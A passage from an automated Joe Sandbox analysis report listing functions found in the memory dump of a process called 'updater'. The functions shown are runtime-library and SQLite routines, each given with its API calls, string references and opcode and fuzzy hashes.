Opcode Fuzzy Hash: 2d47bd10dd57dfc68278ae9b83e621a28611d9d8ab42f54ae0a77457dfce0aef
Instruction Fuzzy Hash: 0761D775B00216ABDF18AB6DCC45A6FBBB6AF94218F24406DEA01A7391DF31DC41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 013F9581 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 154COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 013F95B6
_strlen.LIBCMT ref: 013F9640
_strlen.LIBCMT ref: 013F9695
_strlen.LIBCMT ref: 013F96DD

Strings

CREATE TEMP TABLE , xrefs: 013F9625
, xrefs: 013F9674, 013F9681
, , xrefs: 013F95EF
CREATE TABLE , xrefs: 013F962A, 013F9632

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: $, $CREATE TABLE $CREATE TEMP TABLE
API String ID: 4218353326-108156782
Opcode ID: aeac11a7f8ed0ab11c275d3242cc51ae1d076e567235b9cb21c56f41123be1ce
Instruction ID: ba39ca1504e32d612d745aa412c2e0156d4087012bc23f180c248263551383f9
Opcode Fuzzy Hash: aeac11a7f8ed0ab11c275d3242cc51ae1d076e567235b9cb21c56f41123be1ce
Instruction Fuzzy Hash: 5F514D71E0021AAFCF14DFADC884A9EBBF4FF58218B15406DE919E7251DB34AE44CB90

Uniqueness

Uniqueness Score: -1.00%

Function 01412731 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 01412738
_Maklocstr.LIBCPMT ref: 014127A1
_Maklocstr.LIBCPMT ref: 014127B3
_Maklocchr.LIBCPMT ref: 014127CB
_Maklocchr.LIBCPMT ref: 014127DB
_Getvals.LIBCPMT ref: 014127FD

Part of subcall function 0140B678: _Maklocchr.LIBCPMT ref: 0140B6A7
Part of subcall function 0140B678: _Maklocchr.LIBCPMT ref: 0140B6BD

Strings

true, xrefs: 014127AE
false, xrefs: 0141279C

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: Maklocchr$Maklocstr$GetvalsH_prolog3_
String ID: false$true
API String ID: 3549167292-2658103896
Opcode ID: 5979d8b3c5ec57b55f73d01a93ad4beb51ba319ef43761f00e8042ff8f703ce1
Instruction ID: f0981d844bb77a1689cf58c5bfdeba67037f93d227a7ef3c2a748f8ef62dc867
Opcode Fuzzy Hash: 5979d8b3c5ec57b55f73d01a93ad4beb51ba319ef43761f00e8042ff8f703ce1
Instruction Fuzzy Hash: 512171B6D00314ABDF15EFA6D845ECF7B68EF25610F10801BF9199F2A5DBB09640CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 013C740E Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 78COMMON

Download Yara Rule

APIs

_strlen.LIBCMT ref: 013C7413

Strings

.zoo, xrefs: 013C7455
.zip, xrefs: 013C7444
.tgz, xrefs: 013C74AA
.lzh, xrefs: 013C7477
.arj, xrefs: 013C7488
.gz, xrefs: 013C7499
.arc, xrefs: 013C7466

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: _strlen
String ID: .arc$.arj$.gz$.lzh$.tgz$.zip$.zoo
API String ID: 4218353326-51310709
Opcode ID: 50e94af09f2374dcb96944c547bbb10ffde72751a479e320d32572e01f4558bf
Instruction ID: df0b263059d174e7042592dacfe4c076c71e76210f9c347a3765fadf16b8ea9b
Opcode Fuzzy Hash: 50e94af09f2374dcb96944c547bbb10ffde72751a479e320d32572e01f4558bf
Instruction Fuzzy Hash: 76113B36119F3324F755212F7C59B97BE884DB28743B4802FDD04B4491EE69EC834575

Uniqueness

Uniqueness Score: -1.00%

Function 0143973A Relevance: 13.7, APIs: 9, Instructions: 200COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 014397A8
_free.LIBCMT ref: 014397B4
_free.LIBCMT ref: 014398DD
_free.LIBCMT ref: 014398E8

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: e5766cc4d7a12108b2af387902c45e69c056a547191e6ff4a8b3d3a26faf9def
Instruction ID: 99b848cb1607a65560e537bb688ed8dc09a0fc238c5cd5b79a430669ae34de54
Opcode Fuzzy Hash: e5766cc4d7a12108b2af387902c45e69c056a547191e6ff4a8b3d3a26faf9def
Instruction Fuzzy Hash: A261B272900306EFDB21DF69C880BAAB7E9EFDC314F14455BE955AB3A0E7B09901CB50

Uniqueness

Uniqueness Score: -1.00%

Function 0141280A Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 73COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 01412811
_Maklocstr.LIBCPMT ref: 01412878
_Maklocstr.LIBCPMT ref: 0141288A
_Maklocchr.LIBCPMT ref: 014128A2
_Maklocchr.LIBCPMT ref: 014128B2

Strings

true, xrefs: 01412885
false, xrefs: 01412873

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: MaklocchrMaklocstr$H_prolog3_
String ID: false$true
API String ID: 2404127365-2658103896
Opcode ID: 74e9885bc1782d9fdd8b449e57ce80a4af6145f28abe5ffafbfb6d19d0d071a3
Instruction ID: 92c94f82f4c6f111d36281c7d87e1236ad4f844f8efb5c147136d2193530efc5
Opcode Fuzzy Hash: 74e9885bc1782d9fdd8b449e57ce80a4af6145f28abe5ffafbfb6d19d0d071a3
Instruction Fuzzy Hash: FD213BB5C00344ABDB15EFA6C884E9EBBB8EF65700F10845FF9059F265E7709640CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01438881 Relevance: 12.2, APIs: 8, Instructions: 203COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 014388AB
_free.LIBCMT ref: 01438984
_free.LIBCMT ref: 014389B1

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: _free$___from_strstr_to_strchr
String ID:
API String ID: 3409252457-0
Opcode ID: f8777493d530d7507969db18aa70e557896c183cabfe14e7e4be113f38bfcc06
Instruction ID: 4d460cd9902488dcb5304ada4e8d7b5e015d4c053d217b11feed9649fa309159
Opcode Fuzzy Hash: f8777493d530d7507969db18aa70e557896c183cabfe14e7e4be113f38bfcc06
Instruction Fuzzy Hash: 0651E971E043076FDF25BFB99840A6EFBB8AF99324B04435FF910972B1E63585418B51

Uniqueness

Uniqueness Score: -1.00%

Function 0142EE41 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 264COMMON

Download Yara Rule

APIs

Part of subcall function 0143049B: GetLastError.KERNEL32(?,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 014304A0
Part of subcall function 0143049B: SetLastError.KERNEL32(00000000,00000005,000000FF,?,?,01422F7E,?,?,?,?,01423E8D,?), ref: 0143053E

_free.LIBCMT ref: 0142F14E
_free.LIBCMT ref: 0142F167
_free.LIBCMT ref: 0142F1A5
_free.LIBCMT ref: 0142F1AE
_free.LIBCMT ref: 0142F1BA

Strings

C, xrefs: 0142EF9D

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: _free$ErrorLast
String ID: C
API String ID: 3291180501-1037565863
Opcode ID: 1810912efb5a930e341e718ba72d4a11c6791e8782b43e8d4f6be4c449921dfd
Instruction ID: dda79624af59930f40b2b5c4fde213c61cfe28dbd9c8649d3173b5a2e6f06eec
Opcode Fuzzy Hash: 1810912efb5a930e341e718ba72d4a11c6791e8782b43e8d4f6be4c449921dfd
Instruction Fuzzy Hash: 6BB13B75A0122A9BDB24DF18C894AAEB7B4FF58314F9045EED909A7360D771AEC4CF40

Uniqueness

Uniqueness Score: -1.00%

Function 0141D67B Relevance: 10.7, APIs: 7, Instructions: 222COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?), ref: 0141D706
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0141D794
__alloca_probe_16.LIBCMT ref: 0141D7BE
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0141D806
MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 0141D820
__alloca_probe_16.LIBCMT ref: 0141D846
MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0141D883

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide$__alloca_probe_16$Info
String ID:
API String ID: 2298828789-0
Opcode ID: a74ee2dc79d94bb1379879ee2cbb8767542343c7369ee66621ea8afec484fe33
Instruction ID: d6055cea3f898efba0cdad451ba1ab02ac34af511b8a333fe1a67bdf0aa454b2
Opcode Fuzzy Hash: a74ee2dc79d94bb1379879ee2cbb8767542343c7369ee66621ea8afec484fe33
Instruction Fuzzy Hash: 1771A5B1D002569BEF219FE9DC48AEF7FB5AF15650F18041BED28A7278D7318804CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0141EFD0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 0141F007
___except_validate_context_record.LIBVCRUNTIME ref: 0141F00F
_ValidateLocalCookies.LIBCMT ref: 0141F098
__IsNonwritableInCurrentImage.LIBCMT ref: 0141F0C3
_ValidateLocalCookies.LIBCMT ref: 0141F118

Strings

csm, xrefs: 0141F0AD

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: a6ef9371b5a15b7e25b3bdb7553efd462a1b1593d358e6041088341b94278531
Instruction ID: 3b5db0f51cda574b91914bb20e3999019bd3b83cdf0800e237ac1a2b062c78f5
Opcode Fuzzy Hash: a6ef9371b5a15b7e25b3bdb7553efd462a1b1593d358e6041088341b94278531
Instruction Fuzzy Hash: 3741D574A00209AFCF10DF69C844A9E7FA5EF14318F14815BEA186B375D7319A4ACB90

Uniqueness

Uniqueness Score: -1.00%

Function 013E37DD Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 95COMMON

Download Yara Rule

APIs

GetTempPathW.KERNEL32(000000E6,?), ref: 013E3823
_strlen.LIBCMT ref: 013E387C
_strlen.LIBCMT ref: 013E38B9

Strings

%s\etilqs_, xrefs: 013E38A9
\, xrefs: 013E3884

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: _strlen$PathTemp
String ID: %s\etilqs_$\
API String ID: 1134129140-699725532
Opcode ID: 9c205824805f4de8cc4ca6d4d0e00cd343bddd5aae02a70c762b89f04cd67915
Instruction ID: 7c2334eb17c9dfb90601c53b4405c160e91756a40785d98caee2e488a0f7505e
Opcode Fuzzy Hash: 9c205824805f4de8cc4ca6d4d0e00cd343bddd5aae02a70c762b89f04cd67915
Instruction Fuzzy Hash: 06318E7190437B9EF720962D9C08EFB3BECAF64608F1404A9E455D31C1EB70DA88C761

Uniqueness

Uniqueness Score: -1.00%

Function 014317B1 Relevance: 9.3, APIs: 6, Instructions: 318fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32 ref: 014317F9
__fassign.LIBCMT ref: 014319D8
__fassign.LIBCMT ref: 014319F5
WriteFile.KERNEL32(?,00000001,00000000,?,00000000), ref: 01431A3D
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 01431A7D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 01431B29

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: FileWrite__fassign$ConsoleErrorLast
String ID:
API String ID: 4031098158-0
Opcode ID: c6d8d75b6d4ef4d3c872c50678ca8549db0159a35f4d7f1199f0f5db1730f709
Instruction ID: 73177bd3afd89d7dd198b9f324dace1cd9ad8e53e5cc654b85ac18a007cc9c5e
Opcode Fuzzy Hash: c6d8d75b6d4ef4d3c872c50678ca8549db0159a35f4d7f1199f0f5db1730f709
Instruction Fuzzy Hash: 17D19B75D002589FDF15CFA8C8809EDBBB5FF88314F28016AE955BB361D730A946CB60

Uniqueness

Uniqueness Score: -1.00%

Function 01441440 Relevance: 9.3, APIs: 6, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 01441554
__FindPESection.LIBCMT ref: 01441571
VirtualQuery.KERNEL32(83000000,CE5F1F10,0000001C,CE5F1F10,?,?,?), ref: 01441656
__FindPESection.LIBCMT ref: 01441693
_ValidateScopeTableHandlers.LIBCMT ref: 014416B3
__FindPESection.LIBCMT ref: 014416CD

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: FindSection$HandlersScopeTableValidate$QueryVirtual
String ID:
API String ID: 2529200597-0
Opcode ID: 5ec4f858a337f0186dc95efe3faf407ee8d5e69cf8c4ff97aecb4920c24072fa
Instruction ID: 23357d4d0bae21f2a6f127de70497c57f0d8c2edd6e6cb658b6e18cdd84a0abf
Opcode Fuzzy Hash: 5ec4f858a337f0186dc95efe3faf407ee8d5e69cf8c4ff97aecb4920c24072fa
Instruction Fuzzy Hash: 8CA1EF75E002159BEB20DF5DD980BAEB7A9EB04B14F15022AD909E73B1E731FC81CB91

Uniqueness

Uniqueness Score: -1.00%

Function 013DEAE4 Relevance: 9.1, APIs: 6, Instructions: 128COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 013DEAF7
int.LIBCPMT ref: 013DEB0E

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

std::_Facet_Register.LIBCPMT ref: 013DEB48
std::_Lockit::~_Lockit.LIBCPMT ref: 013DEB5E
Concurrency::cancel_current_task.LIBCPMT ref: 013DEB73
_Deallocate.LIBCONCRT ref: 013DEC3C

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskDeallocateFacet_Register
String ID:
API String ID: 55420841-0
Opcode ID: f938ff0e6d0a8fba20336a712ce9392bf690a1030387f6a881f2def658b34a07
Instruction ID: 49c1eb257d985602dab57e38521d7ac861589bfcf0fb61d8d0ebb2983c60d07d
Opcode Fuzzy Hash: f938ff0e6d0a8fba20336a712ce9392bf690a1030387f6a881f2def658b34a07
Instruction Fuzzy Hash: A9419676A04205DFCB28DF6CD4849AEBBF5EF54314B24462DE556D7390DB30AE41CB50

Uniqueness

Uniqueness Score: -1.00%

Function 014210B9 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,014210B0,01420EE6,0141E5FE), ref: 014210C7
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 014210D5
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 014210EE
SetLastError.KERNEL32(00000000,014210B0,01420EE6,0141E5FE), ref: 01421140

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 3bcf0f25e5f5d1fba02601b0114d80fb58a5267f683c5cc6b431bb601b083ba3
Instruction ID: 8547cad8c77bc4da5617ed0d61f287eaba0d595d28d0386a072fcf4ff1d4cc88
Opcode Fuzzy Hash: 3bcf0f25e5f5d1fba02601b0114d80fb58a5267f683c5cc6b431bb601b083ba3
Instruction Fuzzy Hash: 4F012D7221E2336EA635267D6C84D773A56EB26AB4760432FE110451F8DFF104819250

Uniqueness

Uniqueness Score: -1.00%

Function 013E36E9 Relevance: 9.1, APIs: 6, Instructions: 58fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(00000000), ref: 013E3721
GetFileAttributesW.KERNEL32(00000000), ref: 013E3728

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: File$AttributesDelete
String ID:
API String ID: 2910425767-0
Opcode ID: 23d084456057705816afbf78591218b45b12d520691f48d1e79a15eebe6f08a7
Instruction ID: b7f7b8eb4bd86e4ee05bdcd1e6751741ffbcc350f7db26212d15686fda5f0e2f
Opcode Fuzzy Hash: 23d084456057705816afbf78591218b45b12d520691f48d1e79a15eebe6f08a7
Instruction Fuzzy Hash: 8901B5BE286736AFD7252B7CACCC56E3AD87B0527AB100615F623C71C1CB24844243A5

Uniqueness

Uniqueness Score: -1.00%

Function 0140C133 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0140C144
int.LIBCPMT ref: 0140C15B

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

messages.LIBCPMT ref: 0140C17E
std::_Facet_Register.LIBCPMT ref: 0140C195
std::_Lockit::~_Lockit.LIBCPMT ref: 0140C1B5
Concurrency::cancel_current_task.LIBCPMT ref: 0140C1C2

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registermessages
String ID:
API String ID: 4267825564-0
Opcode ID: 0c2a2805474283f9118e22ade9ed313875dd9fe1bf2c9c5679f104486bac378c
Instruction ID: 8c131bae7156868acf6c4509a81b227568484c124f3409653835c8eb31b86925
Opcode Fuzzy Hash: 0c2a2805474283f9118e22ade9ed313875dd9fe1bf2c9c5679f104486bac378c
Instruction Fuzzy Hash: B7010435D00116DBCB06EB698844ABEB775BFA0714F18415FD8016B2F0CF348E45DB81

Uniqueness

Uniqueness Score: -1.00%

Function 0140C009 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0140C01A
int.LIBCPMT ref: 0140C031

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

ctype.LIBCPMT ref: 0140C054
std::_Facet_Register.LIBCPMT ref: 0140C06B
std::_Lockit::~_Lockit.LIBCPMT ref: 0140C08B
Concurrency::cancel_current_task.LIBCPMT ref: 0140C098

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Registerctype
String ID:
API String ID: 3097546199-0
Opcode ID: f921e2e470434dff8cee1f1fe3befcbdf973cb7fe0eae63d73535e7bc8175484
Instruction ID: 492d5e8b1bc1511d21e514e103a92bcdb34725ea79b8797e6ceba777750fa4ef
Opcode Fuzzy Hash: f921e2e470434dff8cee1f1fe3befcbdf973cb7fe0eae63d73535e7bc8175484
Instruction Fuzzy Hash: FA012675900116DBCB06EBA9C844ABEBB70BF61724F18825ED810673F0CF348E09C781

Uniqueness

Uniqueness Score: -1.00%

Function 0140C09E Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0140C0AF
int.LIBCPMT ref: 0140C0C6

Part of subcall function 013C1837: std::_Lockit::_Lockit.LIBCPMT ref: 013C1848
Part of subcall function 013C1837: std::_Lockit::~_Lockit.LIBCPMT ref: 013C1862

messages.LIBCPMT ref: 0140C0E9
std::_Facet_Register.LIBCPMT ref: 0140C100
std::_Lockit::~_Lockit.LIBCPMT ref: 0140C120
Concurrency::cancel_current_task.LIBCPMT ref: 0140C12D

Memory Dump Source

